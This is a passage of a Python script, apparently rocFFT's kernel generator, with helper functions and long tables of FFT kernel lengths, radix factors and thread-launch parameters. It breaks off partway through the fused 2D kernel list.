#!/usr/bin/env python3
"""rocFFT kernel generator.
It accept two sub-commands:
1. list - lists files that will be generated
2. generate - generate them!
"""
import argparse
import collections
import functools
import itertools
import subprocess
import sys
import os
from copy import deepcopy
from pathlib import Path
from types import SimpleNamespace as NS
from operator import mul
from generator import (ArgumentList, BaseNode, Call, CommentBlock, Function, Include,
LineBreak, Map, StatementList, Variable, name_args, write,
clang_format_file)
from collections import namedtuple
LaunchParams = namedtuple('LaunchParams', ['transforms_per_block',
'threads_per_block',
'threads_per_transform',
'half_lds'])
#
# CMake helpers
#
def scjoin(xs):
"""Join 'xs' with semi-colons."""
return ';'.join(str(x) for x in xs)
def scprint(xs):
"""Print 'xs', joined by semi-colons, on a single line. CMake friendly."""
print(scjoin(xs), end='', flush=True)
def cjoin(xs):
"""Join 'xs' with commas."""
return ','.join(str(x) for x in xs)
#
# Helpers
#
def flatten(lst):
"""Flatten a list of lists to a list."""
return sum(lst, [])
def unique(kernels):
"""Merge kernel lists without duplicated meta.length; ignore later ones."""
r, s = list(), set()
for kernel in kernels:
if isinstance(kernel.length, list):
key = tuple(kernel.length) + (kernel.scheme,)
else:
key = (kernel.length, kernel.scheme)
if key not in s:
s.add(key)
r.append(kernel)
return r
#
# Prototype generators
#
@name_args(['function'])
class FFTKernel(BaseNode):
def __str__(self):
f = 'FFTKernel('
if self.function.meta.runtime_compile:
f += 'nullptr'
else:
f += str(self.function.address())
use_3steps_large_twd = getattr(self.function.meta, 'use_3steps_large_twd', None)
if use_3steps_large_twd is not None:
f += ', ' + str(use_3steps_large_twd[self.function.meta.precision])
else:
f += ', false'
factors = getattr(self.function.meta, 'factors', None)
if factors is not None:
f += ', {' + cjoin(factors) + '}'
transforms_per_block = getattr(self.function.meta, 'transforms_per_block', None)
if transforms_per_block is not None:
f += ', ' + str(transforms_per_block)
threads_per_block = getattr(self.function.meta, 'threads_per_block', None)
if threads_per_block is not None:
f += ', ' + str(threads_per_block)
f += ', {' + ','.join([str(s) for s in self.function.meta.threads_per_transform]) + '}'
block_width = getattr(self.function.meta, 'block_width', None)
if block_width is not None:
f += ', ' + str(block_width)
half_lds = None
if hasattr(self.function.meta, 'params'):
half_lds = getattr(self.function.meta.params, 'half_lds', None)
if half_lds is not None:
if block_width is None:
f += ', 0'
f += ', ' + str(half_lds).lower()
f += ')'
return f
def generate_cpu_function_pool(functions):
"""Generate function to populate the kernel function pool."""
function_map = Map('function_map')
precisions = { 'sp': 'rocfft_precision_single',
'dp': 'rocfft_precision_double' }
populate = StatementList()
for f in functions:
length, precision, scheme, transpose = f.meta.length, f.meta.precision, f.meta.scheme, f.meta.transpose
if isinstance(length, (int, str)):
length = [length, 0]
key = Call(name='std::make_tuple',
arguments=ArgumentList('std::array<size_t, 2>({' + cjoin(length) + '})',
precisions[precision],
scheme,
transpose or 'NONE')).inline()
populate += function_map.assert_emplace(key, FFTKernel(f))
return StatementList(
Include('<iostream>'),
Include('"../include/function_pool.h"'),
StatementList(*[f.prototype() for f in functions]),
Function(name='function_pool::function_pool',
value=False,
arguments=ArgumentList(),
body=populate))
def list_generated_kernels(kernels):
"""Return list of kernel filenames."""
return [kernel_file_name(x) for x in kernels if not x.runtime_compile]
#
# Main!
#
def kernel_file_name(ns):
"""Given kernel info namespace, return reasonable file name."""
assert hasattr(ns, 'length')
length = ns.length
if isinstance(length, (tuple, list)):
length = 'x'.join(str(x) for x in length)
postfix = ''
if ns.scheme == 'CS_KERNEL_STOCKHAM_BLOCK_CC':
postfix = '_sbcc'
elif ns.scheme == 'CS_KERNEL_STOCKHAM_BLOCK_RC':
postfix = '_sbrc'
elif ns.scheme == 'CS_KERNEL_STOCKHAM_BLOCK_CR':
postfix = '_sbcr'
return f'rocfft_len{length}{postfix}.cpp'
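# Each small-kernel entry below is a SimpleNamespace describing one fixed-length FFT kernel:
# 'length' is the FFT size, 'factors' its radix decomposition, and 'threads_per_block' /
# 'threads_per_transform' control the launch geometry; optional fields such as 'half_lds'
# presumably tune LDS usage for specific lengths.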
def list_small_kernels():
"""Return list of small kernels to generate."""
kernels1d = [
NS(length= 1, threads_per_block= 64, threads_per_transform= 1, factors=(1,)),
NS(length= 2, threads_per_block= 64, threads_per_transform= 1, factors=(2,)),
NS(length= 3, threads_per_block= 64, threads_per_transform= 1, factors=(3,)),
NS(length= 4, threads_per_block=128, threads_per_transform= 1, factors=(4,)),
NS(length= 5, threads_per_block=128, threads_per_transform= 1, factors=(5,)),
NS(length= 6, threads_per_block=128, threads_per_transform= 1, factors=(6,)),
NS(length= 7, threads_per_block= 64, threads_per_transform= 1, factors=(7,)),
NS(length= 8, threads_per_block= 64, threads_per_transform= 4, factors=(4, 2)),
NS(length= 9, threads_per_block= 64, threads_per_transform= 3, factors=(3, 3)),
NS(length= 10, threads_per_block= 64, threads_per_transform= 1, factors=(10,)),
NS(length= 11, threads_per_block=128, threads_per_transform= 1, factors=(11,)),
NS(length= 12, threads_per_block=128, threads_per_transform= 6, factors=(6, 2)),
NS(length= 13, threads_per_block= 64, threads_per_transform= 1, factors=(13,)),
NS(length= 14, threads_per_block=128, threads_per_transform= 7, factors=(7, 2)),
NS(length= 15, threads_per_block=128, threads_per_transform= 5, factors=(3, 5)),
NS(length= 16, threads_per_block= 64, threads_per_transform= 4, factors=(4, 4)),
NS(length= 17, threads_per_block=256, threads_per_transform= 1, factors=(17,)),
NS(length= 18, threads_per_block= 64, threads_per_transform= 6, factors=(3, 6)),
NS(length= 20, threads_per_block=256, threads_per_transform= 10, factors=(5, 4)),
NS(length= 21, threads_per_block=128, threads_per_transform= 7, factors=(3, 7)),
NS(length= 22, threads_per_block= 64, threads_per_transform= 2, factors=(11, 2)),
NS(length= 24, threads_per_block=256, threads_per_transform= 8, factors=(8, 3)),
NS(length= 25, threads_per_block=256, threads_per_transform= 5, factors=(5, 5)),
NS(length= 26, threads_per_block= 64, threads_per_transform= 2, factors=(13, 2)),
NS(length= 27, threads_per_block=256, threads_per_transform= 9, factors=(3, 3, 3)),
NS(length= 28, threads_per_block= 64, threads_per_transform= 4, factors=(7, 4)),
NS(length= 30, threads_per_block=128, threads_per_transform= 10, factors=(10, 3)),
NS(length= 32, threads_per_block= 64, threads_per_transform= 16, factors=(16, 2)),
NS(length= 36, threads_per_block= 64, threads_per_transform= 6, factors=(6, 6)),
NS(length= 40, threads_per_block=128, threads_per_transform= 10, factors=(10, 4)),
NS(length= 42, threads_per_block=256, threads_per_transform= 7, factors=(7, 6)),
NS(length= 44, threads_per_block= 64, threads_per_transform= 4, factors=(11, 4)),
NS(length= 45, threads_per_block=128, threads_per_transform= 15, factors=(5, 3, 3)),
NS(length= 48, threads_per_block= 64, threads_per_transform= 16, factors=(4, 3, 4)),
NS(length= 49, threads_per_block= 64, threads_per_transform= 7, factors=(7, 7)),
NS(length= 50, threads_per_block=256, threads_per_transform= 10, factors=(10, 5)),
NS(length= 52, threads_per_block= 64, threads_per_transform= 4, factors=(13, 4)),
NS(length= 54, threads_per_block=256, threads_per_transform= 18, factors=(6, 3, 3)),
NS(length= 56, threads_per_block=128, threads_per_transform= 8, factors=(7, 8)),
NS(length= 60, threads_per_block= 64, threads_per_transform= 10, factors=(6, 10)),
NS(length= 64, threads_per_block= 64, threads_per_transform= 16, factors=(4, 4, 4)),
NS(length= 72, threads_per_block= 64, threads_per_transform= 9, factors=(8, 3, 3)),
NS(length= 75, threads_per_block=256, threads_per_transform= 25, factors=(5, 5, 3)),
NS(length= 80, threads_per_block= 64, threads_per_transform= 10, factors=(5, 2, 8)),
NS(length= 81, threads_per_block=128, threads_per_transform= 27, factors=(3, 3, 3, 3)),
NS(length= 84, threads_per_block=128, threads_per_transform= 12, factors=(7, 2, 6)),
NS(length= 88, threads_per_block=128, threads_per_transform= 11, factors=(11, 8)),
NS(length= 90, threads_per_block= 64, threads_per_transform= 9, factors=(3, 3, 10)),
NS(length= 96, threads_per_block=128, threads_per_transform= 16, factors=(6, 16), half_lds=False),
NS(length= 100, threads_per_block= 64, threads_per_transform= 10, factors=(10, 10)),
NS(length= 104, threads_per_block= 64, threads_per_transform= 8, factors=(13, 8)),
NS(length= 108, threads_per_block=256, threads_per_transform= 36, factors=(6, 6, 3)),
NS(length= 112, threads_per_block=256, threads_per_transform= 16, factors=(16, 7), half_lds=False),
NS(length= 120, threads_per_block= 64, threads_per_transform= 12, factors=(6, 10, 2)),
NS(length= 121, threads_per_block=128, threads_per_transform= 11, factors=(11, 11)),
NS(length= 125, threads_per_block=256, threads_per_transform= 25, factors=(5, 5, 5), half_lds=False),
NS(length= 128, threads_per_block=256, threads_per_transform= 16, factors=(16, 8)),
NS(length= 135, threads_per_block=128, threads_per_transform= 9, factors=(5, 3, 3, 3)),
NS(length= 144, threads_per_block=128, threads_per_transform= 12, factors=(6, 6, 4)),
NS(length= 150, threads_per_block= 64, threads_per_transform= 5, factors=(10, 5, 3)),
NS(length= 160, threads_per_block=256, threads_per_transform= 16, factors=(16, 10)),
NS(length= 162, threads_per_block=256, threads_per_transform= 27, factors=(6, 3, 3, 3)),
NS(length= 168, threads_per_block=256, threads_per_transform= 56, factors=(8, 7, 3), half_lds=False),
NS(length= 169, threads_per_block=256, threads_per_transform= 13, factors=(13, 13)),
NS(length= 176, threads_per_block= 64, threads_per_transform= 16, factors=(11, 16)),
NS(length= 180, threads_per_block=256, threads_per_transform= 60, factors=(10, 6, 3), half_lds=False),
NS(length= 192, threads_per_block=128, threads_per_transform= 16, factors=(6, 4, 4, 2)),
NS(length= 200, threads_per_block= 64, threads_per_transform= 20, factors=(10, 10, 2)),
NS(length= 208, threads_per_block= 64, threads_per_transform= 16, factors=(13, 16)),
NS(length= 216, threads_per_block=256, threads_per_transform= 36, factors=(6, 6, 6)),
NS(length= 224, threads_per_block= 64, threads_per_transform= 16, factors=(7, 2, 2, 2, 2, 2)),
NS(length= 225, threads_per_block=256, threads_per_transform= 75, factors=(5, 5, 3, 3)),
NS(length= 240, threads_per_block=128, threads_per_transform= 48, factors=(8, 5, 6)),
NS(length= 243, threads_per_block=256, threads_per_transform= 81, factors=(3, 3, 3, 3, 3)),
NS(length= 250, threads_per_block=128, threads_per_transform= 25, factors=(10, 5, 5)),
NS(length= 256, threads_per_block= 64, threads_per_transform= 64, factors=(4, 4, 4, 4)),
NS(length= 270, threads_per_block=128, threads_per_transform= 27, factors=(10, 3, 3, 3)),
NS(length= 272, threads_per_block=128, threads_per_transform= 17, factors=(16, 17)),
NS(length= 288, threads_per_block=128, threads_per_transform= 24, factors=(6, 6, 4, 2)),
NS(length= 300, threads_per_block= 64, threads_per_transform= 30, factors=(10, 10, 3)),
NS(length= 320, threads_per_block= 64, threads_per_transform= 16, factors=(10, 4, 4, 2)),
NS(length= 324, threads_per_block= 64, threads_per_transform= 54, factors=(3, 6, 6, 3)),
NS(length= 336, threads_per_block=128, threads_per_transform= 56, factors=(8, 7, 6)),
NS(length= 343, threads_per_block=256, threads_per_transform= 49, factors=(7, 7, 7)),
NS(length= 360, threads_per_block=256, threads_per_transform= 60, factors=(10, 6, 6)),
NS(length= 375, threads_per_block=128, threads_per_transform= 25, factors=(5, 5, 5, 3)),
NS(length= 384, threads_per_block=128, threads_per_transform= 32, factors=(6, 4, 4, 4)),
NS(length= 400, threads_per_block=128, threads_per_transform= 40, factors=(4, 10, 10)),
NS(length= 405, threads_per_block=128, threads_per_transform= 27, factors=(5, 3, 3, 3, 3)),
NS(length= 432, threads_per_block= 64, threads_per_transform= 27, factors=(3, 16, 3, 3)),
NS(length= 450, threads_per_block=128, threads_per_transform= 30, factors=(10, 5, 3, 3)),
NS(length= 480, threads_per_block= 64, threads_per_transform= 16, factors=(10, 8, 6)),
NS(length= 486, threads_per_block=256, threads_per_transform=162, factors=(6, 3, 3, 3, 3)),
NS(length= 500, threads_per_block=128, threads_per_transform=100, factors=(10, 5, 10)),
NS(length= 512, threads_per_block= 64, threads_per_transform= 64, factors=(8, 8, 8)),
NS(length= 528, threads_per_block= 64, threads_per_transform= 48, factors=(4, 4, 3, 11)),
NS(length= 540, threads_per_block=256, threads_per_transform= 54, factors=(3, 10, 6, 3)),
NS(length= 576, threads_per_block=128, threads_per_transform= 96, factors=(16, 6, 6)),
NS(length= 600, threads_per_block= 64, threads_per_transform= 60, factors=(10, 6, 10)),
NS(length= 625, threads_per_block=128, threads_per_transform=125, factors=(5, 5, 5, 5)),
NS(length= 640, threads_per_block=128, threads_per_transform= 64, factors=(8, 10, 8)),
NS(length= 648, threads_per_block=256, threads_per_transform=216, factors=(8, 3, 3, 3, 3)),
NS(length= 675, threads_per_block=256, threads_per_transform=225, factors=(5, 5, 3, 3, 3)),
NS(length= 720, threads_per_block=256, threads_per_transform=120, factors=(10, 3, 8, 3)),
NS(length= 729, threads_per_block=256, threads_per_transform=243, factors=(3, 3, 3, 3, 3, 3)),
NS(length= 750, threads_per_block=256, threads_per_transform=250, factors=(10, 5, 3, 5)),
NS(length= 768, threads_per_block= 64, threads_per_transform= 48, factors=(16, 3, 16)),
NS(length= 800, threads_per_block=256, threads_per_transform=160, factors=(16, 5, 10)),
NS(length= 810, threads_per_block=128, threads_per_transform= 81, factors=(3, 10, 3, 3, 3)),
NS(length= 864, threads_per_block= 64, threads_per_transform= 54, factors=(3, 6, 16, 3)),
NS(length= 900, threads_per_block=256, threads_per_transform= 90, factors=(10, 10, 3, 3)),
NS(length= 960, threads_per_block=256, threads_per_transform=160, factors=(16, 10, 6), half_lds=False),
NS(length= 972, threads_per_block=256, threads_per_transform=162, factors=(3, 6, 3, 6, 3)),
NS(length=1000, threads_per_block=128, threads_per_transform=100, factors=(10, 10, 10)),
NS(length=1024, threads_per_block=128, threads_per_transform=128, factors=(8, 8, 4, 4)),
NS(length=1040, threads_per_block=256, threads_per_transform=208, factors=(13, 16, 5)),
NS(length=1080, threads_per_block=256, threads_per_transform=108, factors=(6, 10, 6, 3)),
NS(length=1125, threads_per_block=256, threads_per_transform=225, factors=(5, 5, 3, 3, 5)),
NS(length=1152, threads_per_block=256, threads_per_transform=144, factors=(4, 3, 8, 3, 4)),
NS(length=1200, threads_per_block=256, threads_per_transform= 75, factors=(5, 5, 16, 3)),
NS(length=1215, threads_per_block=256, threads_per_transform=243, factors=(5, 3, 3, 3, 3, 3)),
NS(length=1250, threads_per_block=256, threads_per_transform=250, factors=(5, 10, 5, 5)),
NS(length=1280, threads_per_block=128, threads_per_transform= 80, factors=(16, 5, 16)),
NS(length=1296, threads_per_block=128, threads_per_transform=108, factors=(6, 6, 6, 6)),
NS(length=1350, threads_per_block=256, threads_per_transform=135, factors=(5, 10, 3, 3, 3)),
NS(length=1440, threads_per_block=128, threads_per_transform= 90, factors=(10, 16, 3, 3)),
NS(length=1458, threads_per_block=256, threads_per_transform=243, factors=(6, 3, 3, 3, 3, 3)),
NS(length=1500, threads_per_block=256, threads_per_transform=150, factors=(5, 10, 10, 3)),
NS(length=1536, threads_per_block=256, threads_per_transform=256, factors=(16, 16, 6)),
NS(length=1600, threads_per_block=256, threads_per_transform=100, factors=(10, 16, 10)),
NS(length=1620, threads_per_block=256, threads_per_transform=162, factors=(10, 3, 3, 6, 3)),
NS(length=1728, threads_per_block=128, threads_per_transform=108, factors=(3, 6, 6, 16)),
NS(length=1800, threads_per_block=256, threads_per_transform=180, factors=(10, 6, 10, 3)),
NS(length=1875, threads_per_block=256, threads_per_transform=125, factors=(5, 5, 5, 5, 3)),
NS(length=1920, threads_per_block=256, threads_per_transform=120, factors=(10, 6, 16, 2)),
NS(length=1944, threads_per_block=256, threads_per_transform=243, factors=(3, 3, 3, 3, 8, 3)),
NS(length=2000, threads_per_block=128, threads_per_transform=125, factors=(5, 5, 5, 16)),
NS(length=2025, threads_per_block=256, threads_per_transform=135, factors=(3, 3, 5, 5, 3, 3)),
NS(length=2048, threads_per_block=256, threads_per_transform=256, factors=(16, 16, 8)),
NS(length=2160, threads_per_block=256, threads_per_transform= 60, factors=(10, 6, 6, 6)),
NS(length=2187, threads_per_block=256, threads_per_transform=243, factors=(3, 3, 3, 3, 3, 3, 3)),
NS(length=2250, threads_per_block=256, threads_per_transform= 90, factors=(10, 3, 5, 3, 5)),
NS(length=2304, threads_per_block=256, threads_per_transform=192, factors=(6, 6, 4, 4, 4), runtime_compile=True),
NS(length=2400, threads_per_block=256, threads_per_transform=240, factors=(4, 10, 10, 6)),
NS(length=2430, threads_per_block=256, threads_per_transform= 81, factors=(10, 3, 3, 3, 3, 3)),
NS(length=2500, threads_per_block=256, threads_per_transform=250, factors=(10, 5, 10, 5)),
NS(length=2560, threads_per_block=128, threads_per_transform=128, factors=(4, 4, 4, 10, 4)),
NS(length=2592, threads_per_block=256, threads_per_transform=216, factors=(6, 6, 6, 6, 2)),
NS(length=2700, threads_per_block=128, threads_per_transform= 90, factors=(3, 10, 10, 3, 3)),
NS(length=2880, threads_per_block=256, threads_per_transform= 96, factors=(10, 6, 6, 2, 2, 2)),
NS(length=2916, threads_per_block=256, threads_per_transform=243, factors=(6, 6, 3, 3, 3, 3)),
NS(length=3000, threads_per_block=128, threads_per_transform=100, factors=(10, 3, 10, 10)),
NS(length=3072, threads_per_block=256, threads_per_transform=256, factors=(6, 4, 4, 4, 4, 2)),
NS(length=3125, threads_per_block=128, threads_per_transform=125, factors=(5, 5, 5, 5, 5)),
NS(length=3200, threads_per_block=256, threads_per_transform=160, factors=(10, 10, 4, 4, 2)),
NS(length=3240, threads_per_block=128, threads_per_transform=108, factors=(3, 3, 10, 6, 6)),
NS(length=3375, threads_per_block=256, threads_per_transform=225, factors=(5, 5, 5, 3, 3, 3)),
NS(length=3456, threads_per_block=256, threads_per_transform=144, factors=(6, 6, 6, 4, 4)),
NS(length=3600, threads_per_block=256, threads_per_transform=120, factors=(10, 10, 6, 6)),
NS(length=3645, threads_per_block=256, threads_per_transform=243, factors=(5, 3, 3, 3, 3, 3, 3)),
NS(length=3750, threads_per_block=256, threads_per_transform=125, factors=(3, 5, 5, 10, 5)),
NS(length=3840, threads_per_block=256, threads_per_transform=128, factors=(10, 6, 2, 2, 2, 2, 2, 2)),
NS(length=3888, threads_per_block=512, threads_per_transform=324, factors=(16, 3, 3, 3, 3, 3)),
NS(length=4000, threads_per_block=256, threads_per_transform=200, factors=(10, 10, 10, 4)),
NS(length=4050, threads_per_block=256, threads_per_transform=135, factors=(10, 5, 3, 3, 3, 3)),
NS(length=4096, threads_per_block=256, threads_per_transform=256, factors=(16, 16, 16)),
]
kernels = [NS(**kernel.__dict__,
scheme='CS_KERNEL_STOCKHAM',
precision=['sp', 'dp']) for kernel in kernels1d]
return kernels
def list_2d_kernels():
"""Return list of fused 2D kernels to generate."""
fused_kernels = [
NS(length=[4,4], factors=[[2,2],[2,2]], threads_per_transform=[2,2], threads_per_block=8),
NS(length=[4,8], factors=[[2,2],[4,2]], threads_per_transform=[2,2], threads_per_block=16),
NS(length=[4,9], factors=[[2,2],[3,3]], threads_per_transform=[2,3], threads_per_block=18),
NS(length=[4,16], factors=[[2,2],[4,4]], threads_per_transform=[2,4], threads_per_block=32),
NS(length=[4,25], factors=[[2,2],[5,5]], threads_per_transform=[2,5], threads_per_block=50),
NS(length=[4,27], factors=[[2,2],[3,3,3]], threads_per_transform=[2,9], threads_per_block=54),
NS(length=[4,32], factors=[[2,2],[8,4]], threads_per_transform=[2,4], threads_per_block=64),
NS(length=[4,64], factors=[[2,2],[4,4,4]], threads_per_transform=[2,16], threads_per_block=128),
NS(length=[4,81], factors=[[2,2],[3,3,3,3]], threads_per_transform=[2,27], threads_per_block=162),
NS(length=[4,125], factors=[[2,2],[5,5,5]], threads_per_transform=[2,25], threads_per_block=250),
NS(length=[4,128], factors=[[2,2],[8,4,4]], threads_per_transform=[2,16], threads_per_block=256),
NS(length=[4,243], factors=[[2,2],[3,3,3,3,3]], threads_per_transform=[2,81], threads_per_block=486),
NS(length=[4,256], factors=[[2,2],[4,4,4,4]], threads_per_transform=[2,64], threads_per_block=512),
NS(length=[8,4], factors=[[4,2],[2,2]], threads_per_transform=[2,2], threads_per_block=16),
NS(length=[8,8], factors=[[4,2],[4,2]], threads_per_transform=[2,2], threads_per_block=16),
NS(length=[8,9], factors=[[4,2],[3,3]], threads_per_transform=[2,3], threads_per_block=24),
NS(length=[8,16], factors=[[4,2],[4,4]], threads_per_transform=[2,4], threads_per_block=32),
NS(length=[8,25], factors=[[4,2],[5,5]], threads_per_transform=[2,5], threads_per_block=50),
NS(length=[8,27], factors=[[4,2],[3,3,3]], threads_per_transform=[2,9], threads_per_block=72),
NS(length=[8,32], factors=[[4,2],[8,4]], threads_per_transform=[2,4], threads_per_block=64),
NS(length=[8,64], factors=[[4,2],[4,4,4]], threads_per_transform=[2,16], threads_per_block=128),
NS(length=[8,81], factors=[[4,2],[3,3,3,3]], threads_per_transform=[2,27], threads_per_block=216),
NS(length=[8,125], factors=[[4,2],[5,5,5]], threads_per_transform=[2,25], threads_per_block=250),
NS(length=[8,128], factors=[[4,2],[8,4,4]], threads_per_transform=[2,16], threads_per_block=256),
NS(length=[8,243], factors=[[4,2],[3,3,3,3,3]], threads_per_transform=[2,81], threads_per_block=648),
NS(length=[8,256], factors=[[4,2],[4,4,4,4]], threads_per_transform=[2,64], threads_per_block=512),
NS(length=[9,4], factors=[[3,3],[2,2]], threads_per_transform=[3,2], threads_per_block=18),
NS(length=[9,8], factors=[[3,3],[4,2]], threads_per_transform=[3,2], threads_per_block=24),
NS(length=[9,9], factors=[[3,3],[3,3]], threads_per_transform=[3,3], threads_per_block=27),
NS(length=[9,16], factors=[[3,3],[4,4]], threads_per_transform=[3,4], threads_per_block=48),
NS(length=[9,25], factors=[[3,3],[5,5]], threads_per_transform=[3,5], threads_per_block=75),
NS(length=[9,27], factors=[[3,3],[3,3,3]], threads_per_transform=[3,9], threads_per_block=81),
NS(length=[9,32], factors=[[3,3],[8,4]], threads_per_transform=[3,4], threads_per_block=96),
NS(length=[9,64], factors=[[3,3],[4,4,4]], threads_per_transform=[3,16], threads_per_block=192),
NS(length=[9,81], factors=[[3,3],[3,3,3,3]], threads_per_transform=[3,27], threads_per_block=243),
NS(length=[9,125], factors=[[3,3],[5,5,5]], threads_per_transform=[3,25], threads_per_block=375),
NS(length=[9,128], factors=[[3,3],[8,4,4]], threads_per_transform=[3,16], threads_per_block=384),
NS(length=[9,243], factors=[[3,3],[3,3,3,3,3]], threads_per_transform=[3,81], threads_per_block=729),
NS(length=[9,256], factors=[[3,3],[4,4,4,4]], threads_per_transform=[3,64], threads_per_block=768),
NS(length=[16,4], factors=[[4,4],[2,2]], threads_per_transform=[4,2], threads_per_block=32),
NS(length=[16,8], factors=[[4,4],[4,2]], threads_per_transform=[4,2], threads_per_block=32),
NS(length=[16,9], factors=[[4,4],[3,3]], threads_per_transform=[4,3], threads_per_block=48),
NS(length=[16,16], factors=[[4,4],[4,4]], threads_per_transform=[4,4], threads_per_block=64),
NS(length=[16,25], factors=[[4,4],[5,5]], threads_per_transform=[4,5], threads_per_block=100),
NS(length=[16,27], factors=[[4,4],[3,3,3]], threads_per_transform=[4,9], threads_per_block=144),
NS(length=[16,32], factors=[[4,4],[8,4]], threads_per_transform=[4,4], threads_per_block=128),
NS(length=[16,64], factors=[[4,4],[4,4,4]], threads_per_transform=[4,16], threads_per_block=256),
NS(length=[16,81], factors=[[4,4],[3,3,3,3]], threads_per_transform=[4,27], threads_per_block=432),
NS(length=[16,125], factors=[[4,4],[5,5,5]], threads_per_transform=[4,25], threads_per_block=500),
NS(length=[16,128], factors=[[4,4],[8,4,4]], threads_per_transform=[4,16], threads_per_block=512),
NS(length=[25,4], factors=[[5,5],[2,2]], threads_per_transform=[5,2], threads_per_block=50),
NS(length=[25,8], factors=[[5,5],[4,2]], threads_per_transform=[5,2], threads_per_block=50),
NS(length=[25,9], factors=[[5,5],[3,3]], threads_per_transform=[5,3], threads_per_block=75),
NS(length=[25,16], factors=[[5,5],[4,4]], threads_per_transform=[5,4], threads_per_block=100),
NS(length=[25,25], factors=[[5,5],[5,5]], threads_per_transform=[5,5], threads_per_block=125),
NS(length=[25,27], factors=[[5,5],[3,3,3]], threads_per_transform=[5,9], threads_per_block=225),
NS(length=[25,32], factors=[[5,5],[8,4]], threads_per_transform=[5,4], threads_per_block=160),
NS(length=[25,64], factors=[[5,5],[4,4,4]], threads_per_transform=[5,16], threads_per_block=400),
NS(length=[25,81], factors=[[5,5],[3,3,3,3]], threads_per_transform=[5,27], threads_per_block=675),
NS(length=[25,125], factors=[[5,5],[5,5,5]], threads_per_transform=[5,25], threads_per_block=625),
NS(length=[25,128], factors=[[5,5],[8,4,4]], threads_per_transform=[5,16], threads_per_block=640),
NS(length=[27,4], factors=[[3,3,3],[2,2]], threads_per_transform=[9,2], threads_per_block=54),
NS(length=[27,8], factors=[[3,3,3],[4,2]], threads_per_transform=[9,2], threads_per_block=72),
NS(length=[27,9], factors=[[3,3,3],[3,3]], threads_per_transform=[9,3], threads_per_block=81),
NS(length=[27,16], factors=[[3,3,3],[4,4]], threads_per_transform=[9,4], threads_per_block=144),
NS(length=[27,25], factors=[[3,3,3],[5,5]], threads_per_transform=[9,5], threads_per_block=225),
NS(length=[27,27], factors=[[3,3,3],[3,3,3]], threads_per_transform=[9,9], threads_per_block=243),
NS(length=[27,32], factors=[[3,3,3],[8,4]], threads_per_transform=[9,4], threads_per_block=288),
NS(length=[27,64], factors=[[3,3,3],[4,4,4]], threads_per_transform=[9,16], threads_per_block=576),
NS(length=[27,81], factors=[[3,3,3],[3,3,3,3]], threads_per_transform=[9,27], threads_per_block=729),
NS(length=[32,4], factors=[[8,4],[2,2]], threads_per_transform=[4,2], threads_per_block=64),
NS(length=[32,8], factors=[[8,4],[4,2]], threads_per_transform=[4,2], threads_per_block=64),
NS(length=[32,9], factors=[[8,4],[3,3]], threads_per_transform=[4,3], threads_per_block=96),
NS(length=[32,16], factors=[[8,4],[4,4]], threads_per_transform=[4,4], threads_per_block=128),
NS(length=[32,25], factors=[[8,4],[5,5]], threads_per_transform=[4,5], threads_per_block=160),
NS(length=[32,27], factors=[[8,4],[3,3,3]], threads_per_transform=[4,9], threads_per_block=288),
NS(length=[32,32], factors=[[8,4],[8,4]], threads_per_transform=[4,4], threads_per_block=128),
NS(length=[32,64], factors=[[8,4],[4,4,4]], threads_per_transform=[4,16], threads_per_block=512),
NS(length=[32,81], factors=[[8,4],[3,3,3,3]], threads_per_transform=[4,27], threads_per_block=864),
NS(length=[32,125], factors=[[8,4],[5,5,5]], threads_per_transform=[4,25], threads_per_block=800),
NS(length=[32,128], factors=[[8,4],[8,4,4]], threads_per_transform=[4,16], threads_per_block=512),
NS(length=[64,4], factors=[[4,4,4],[2,2]], threads_per_transform=[16,2], threads_per_block=128),
NS(length=[64,8], factors=[[4,4,4],[4,2]], threads_per_transform=[16,2], threads_per_block=128),
NS(length=[64,9], factors=[[4,4,4],[3,3]], threads_per_transform=[16,3], threads_per_block=192),
NS(length=[64,16], factors=[[4,4,4],[4,4]], threads_per_transform=[16,4], threads_per_block=256),
NS(length=[64,25], factors=[[4,4,4],[5,5]], threads_per_transform=[16,5], threads_per_block=400),
NS(length=[64,27], factors=[[4,4,4],[3,3,3]], threads_per_transform=[16,9], threads_per_block=576),
NS(length=[64,32], factors=[[4,4,4],[8,4]], threads_per_transform=[16,4], threads_per_block=512),
NS(length=[81,4], factors=[[3,3,3,3],[2,2]], threads_per_transform=[27,2], threads_per_block=162),
NS(length=[81,8], factors=[[3,3,3,3],[4,2]], threads_per_transform=[27,2], threads_per_block=216),
NS(length=[81,9], factors=[[3,3,3,3],[3,3]], threads_per_transform=[27,3], threads_per_block=243),
NS(length=[81,16], factors=[[3,3,3,3],[4,4]], threads_per_transform=[27,4], threads_per_block=432),
NS(length=[81,25], factors=[[3,3,3,3],[5,5]], threads_per_transform=[27,5], threads_per_block=675),
NS(length=[81,27], factors=[[3,3,3,3],[3,3,3]], threads_per_transform=[27,9], threads_per_block=729),
NS(length=[81,32], factors=[[3,3,3,3],[8,4]], threads_per_transform=[27,4], threads_per_block=864),
NS(length=[125,4], factors=[[5,5,5],[2,2]], threads_per_transform=[25,2], threads_per_block=250),
NS(length=[125,8], factors=[[5,5,5],[4,2]], threads_per_transform=[25,2], threads_per_block=250),
NS(length=[125,9], factors=[[5,5,5],[3,3]], threads_per_transform=[25,3], threads_per_block=375),
NS(length=[125,16], factors=[[5,5,5],[4,4]], threads_per_transform=[25,4], threads_per_block=500),
NS(length=[125,25], factors=[[5,5,5],[5,5]], threads_per_transform=[25,5], threads_per_block=625),
NS(length=[125,32], factors=[[5,5,5],[8,4]], threads_per_transform=[25,4], threads_per_block=800),
NS(length=[128,4], factors=[[8,4,4],[2,2]], threads_per_transform=[16,2], threads_per_block=256),
NS(length=[128,8], factors=[[8,4,4],[4,2]], threads_per_transform=[16,2], threads_per_block=256),
NS(length=[128,9], factors=[[8,4,4],[3,3]], threads_per_transform=[16,3], threads_per_block=384),
NS(length=[128,16], factors=[[8,4,4],[4,4]], threads_per_transform=[16,4], threads_per_block=512),
NS(length=[128,25], factors=[[8,4,4],[5,5]], threads_per_transform=[16,5], threads_per_block=640),
NS(length=[128,32], factors=[[8,4,4],[8,4]], threads_per_transform=[16,4], threads_per_block=512),
NS(length=[243,4], factors=[[3,3,3,3,3],[2,2]], threads_per_transform=[81,2], threads_per_block=486),
NS(length=[243,8], factors=[[3,3,3,3,3],[4,2]], threads_per_transform=[81,2], threads_per_block=648),
NS(length=[243,9], factors=[[3,3,3,3,3],[3,3]], threads_per_transform=[81,3], threads_per_block=729),
NS(length=[256,4], factors=[[4,4,4,4],[2,2]], threads_per_transform=[64,2], threads_per_block=512),
